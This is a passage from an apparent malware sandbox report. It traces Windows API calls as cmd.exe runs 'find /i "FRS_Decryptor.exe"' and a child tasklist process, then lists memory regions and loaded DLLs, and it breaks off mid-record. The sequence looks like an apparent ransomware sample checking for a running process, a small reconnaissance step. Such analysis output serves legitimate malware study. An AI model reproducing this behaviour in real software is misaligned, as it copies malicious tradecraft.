[0098.897] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5bf228, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5bf228) returned 0xffffffff [0098.897] GetLastError () returned 0x2 [0098.897] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5bf228, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5bf228) returned 0x705628 [0098.897] FindClose (in: hFindFile=0x705628 | out: hFindFile=0x705628) returned 1 [0098.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x5bf228, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5bf228) returned 0xffffffff [0098.898] GetLastError () returned 0x2 [0098.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x5bf228, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5bf228) returned 0x705628 [0098.898] FindClose (in: hFindFile=0x705628 | out: hFindFile=0x705628) returned 1 [0098.898] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0098.898] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0098.898] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0098.898] SetErrorMode (uMode=0x0) returned 0x0 [0098.898] SetErrorMode (uMode=0x1) returned 0x0 [0098.898] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x704668, lpFilePart=0x5bf244 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5bf244*="Desktop") returned 0x1c [0098.898] SetErrorMode (uMode=0x0) returned 0x1 [0098.898] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.898] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0098.898] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.898] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.898] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5befd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5befd0) returned 0xffffffff [0098.898] GetLastError () returned 0x2 [0098.898] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5befd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5befd0) returned 0x7004a0 [0098.899] FindClose (in: hFindFile=0x7004a0 | out: hFindFile=0x7004a0) returned 1 [0098.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x5befd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5befd0) returned 0xffffffff [0098.899] GetLastError () returned 0x2 [0098.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x5befd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5befd0) returned 0x7004a0 [0098.899] FindClose (in: hFindFile=0x7004a0 | out: hFindFile=0x7004a0) returned 1 [0098.899] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0098.899] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0098.899] GetConsoleTitleW (in: lpConsoleTitle=0x5bf4cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0098.899] InitializeProcThreadAttributeList (in: lpAttributeList=0x5bf3f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x5bf3dc | out: lpAttributeList=0x5bf3f8, lpSize=0x5bf3dc) returned 1 [0098.899] UpdateProcThreadAttribute (in: lpAttributeList=0x5bf3f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x5bf3e4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5bf3f8, lpPreviousValue=0x0) returned 1 [0098.899] GetStartupInfoW (in: lpStartupInfo=0x5bf430 | out: lpStartupInfo=0x5bf430*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x24c, hStdError=0x2c)) [0098.899] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0098.899] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0098.899] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0098.899] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0098.899] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0098.899] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0098.900] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0098.900] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0098.900] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x5bf380*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5bf3cc | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x5bf3cc*(hProcess=0x60, hThread=0x54, dwProcessId=0xae8, dwThreadId=0xb20)) returned 1 [0098.903] CloseHandle (hObject=0x54) returned 1 [0098.903] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0098.903] GetEnvironmentStringsW () returned 0x70ad78* [0098.903] FreeEnvironmentStringsA (penv="=") returned 1 [0098.903] DeleteProcThreadAttributeList (in: lpAttributeList=0x5bf3f8 | out: lpAttributeList=0x5bf3f8) [0098.903] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0098.903] _close (_FileHandle=4) returned 0 [0098.903] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0099.359] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x5bf740 | out: lpExitCode=0x5bf740*=0x0) returned 1 [0099.359] CloseHandle (hObject=0x64) returned 1 [0099.359] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0099.361] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x5bf740 | out: lpExitCode=0x5bf740*=0x0) returned 1 [0099.361] CloseHandle (hObject=0x60) returned 1 [0099.361] _get_osfhandle (_FileHandle=1) returned 0x24c [0099.361] SetConsoleMode (hConsoleHandle=0x24c, dwMode=0x0) returned 0 [0099.361] _get_osfhandle (_FileHandle=1) returned 0x24c [0099.361] GetConsoleMode (in: hConsoleHandle=0x24c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0099.361] _get_osfhandle (_FileHandle=0) returned 0x24 [0099.361] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0099.362] SetConsoleInputExeNameW () returned 0x1 [0099.362] GetConsoleOutputCP () returned 0x1b5 [0099.362] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0099.362] SetThreadUILanguage (LangId=0x0) returned 0x409 [0099.362] exit (_Code=0) Process: id = "91" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x6be25000" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "90" os_parent_pid = "0xa98" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4712 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 4713 start_va = 0xe60000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 4714 start_va = 0xe80000 end_va = 0xe81fff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 4715 start_va = 0xe90000 end_va = 0xe9efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 4716 start_va = 0xea0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 4717 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 4718 start_va = 0xf20000 end_va = 0xf23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 4719 start_va = 0xf30000 end_va = 0xf30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 4720 start_va = 0xf40000 end_va = 0xf41fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 4721 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4722 start_va = 0x7f4b0000 end_va = 0x7f4d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4b0000" filename = "" Region: id = 4723 start_va = 0x7f4d4000 end_va = 0x7f4d4fff entry_point = 0x0 region_type = private name = "private_0x000000007f4d4000" filename = "" Region: id = 4724 start_va = 0x7f4d6000 end_va = 0x7f4d6fff entry_point = 0x0 region_type = private name = "private_0x000000007f4d6000" filename = "" Region: id = 4725 start_va = 0x7f4dd000 end_va = 0x7f4dffff entry_point = 0x0 region_type = private name = "private_0x000000007f4dd000" filename = "" Region: id = 4726 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4727 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4728 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4729 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4749 start_va = 0xfc0000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 4750 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4751 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4752 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4769 start_va = 0xe60000 end_va = 0xe6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 4770 start_va = 0xe70000 end_va = 0xe73fff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 4771 start_va = 0xe80000 end_va = 0xe82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e80000" filename = "" Region: id = 4772 start_va = 0xf50000 end_va = 0xf50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 4773 start_va = 0xf60000 end_va = 0xf60fff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 4774 start_va = 0xf70000 end_va = 0xf70fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 4775 start_va = 0xf80000 end_va = 0xf83fff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 4776 start_va = 0xf90000 end_va = 0xf90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 4777 start_va = 0xfa0000 end_va = 0xfa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fa0000" filename = "" Region: id = 4778 start_va = 0xfd0000 end_va = 0x104dfff entry_point = 0xfd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4779 start_va = 0x1120000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 4780 start_va = 0x1320000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 4781 start_va = 0x1330000 end_va = 0x14b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001330000" filename = "" Region: id = 4782 start_va = 0x14c0000 end_va = 0x1640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014c0000" filename = "" Region: id = 4783 start_va = 0x1650000 end_va = 0x2a4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001650000" filename = "" Region: id = 4784 start_va = 0x2a50000 end_va = 0x2b91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 4785 start_va = 0x2ba0000 end_va = 0x2e74fff entry_point = 0x2ba0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4786 start_va = 0x2e80000 end_va = 0x327bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e80000" filename = "" Region: id = 4787 start_va = 0x73470000 end_va = 0x734d0fff entry_point = 0x73470000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4788 start_va = 0x734e0000 end_va = 0x734ebfff entry_point = 0x734e0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4789 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 4790 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4791 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4792 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4793 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 4794 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4795 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4796 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 4797 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4798 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4799 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4800 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4801 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4802 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4803 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4804 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4805 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4806 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4807 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4808 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4809 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4810 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4811 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4812 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4813 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4814 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4815 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4816 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4817 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4818 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4819 start_va = 0x7f3b0000 end_va = 0x7f4affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3b0000" filename = "" Region: id = 4820 start_va = 0x73420000 end_va = 0x73461fff entry_point = 0x73420000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4821 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 4822 start_va = 0x1090000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 4823 start_va = 0x10d0000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 4824 start_va = 0x1220000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 4825 start_va = 0x1260000 end_va = 0x129ffff entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 4826 start_va = 0x12a0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 4827 start_va = 0x73410000 end_va = 0x7341ffff entry_point = 0x73410000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4828 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4829 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = 